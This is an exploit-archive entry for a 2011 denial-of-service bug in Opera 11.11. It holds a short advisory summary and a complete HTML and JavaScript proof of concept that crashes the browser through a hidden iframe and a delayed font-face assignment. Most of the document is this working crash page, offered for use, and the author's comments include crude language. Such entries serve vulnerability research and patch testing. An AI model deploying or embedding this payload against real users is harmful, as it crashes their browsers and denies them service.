Opera Web Browser 11.11 - Denial of Service



EKU-ID: 40442 CVE: OSVDB-ID:
Author: echo Published: 2011-06-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/48262/info

The Opera Web Browser is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Opera Web Browser 11.11 is vulnerable; other versions may also be affected.

<html>
  <body>
   <iframe src=&#039;about:blank&#039; id=&#039;bo0om&#039; style="width:0px;height:0px;border:0px none;"></iframe>
   <script type="text/javascript"  language="javascript">

    /*
    *
    * Opera 11.11 Remote  Crash
    * Software link: http://www.opera.com/download/
    * Tested on: Win32 xp home sp 3
    * CVE : null
    *
    * Im too lazy to deep analyze this ,but i thing is just unexploitable crash
    * so f****jixvt
    *      ( dla klechis�awa i jego kosiarki :i )
    *
    */

      var a = window.document.getElementById(&#039;bo0om&#039;);
      var b = a.contentDocument.createElement(&#039;font&#039;);
      a.src=&#039;about:blank&#039;;
      setTimeout(&#039;b.face = "h3h";&#039;,500);

   </script>
  </body>
</html>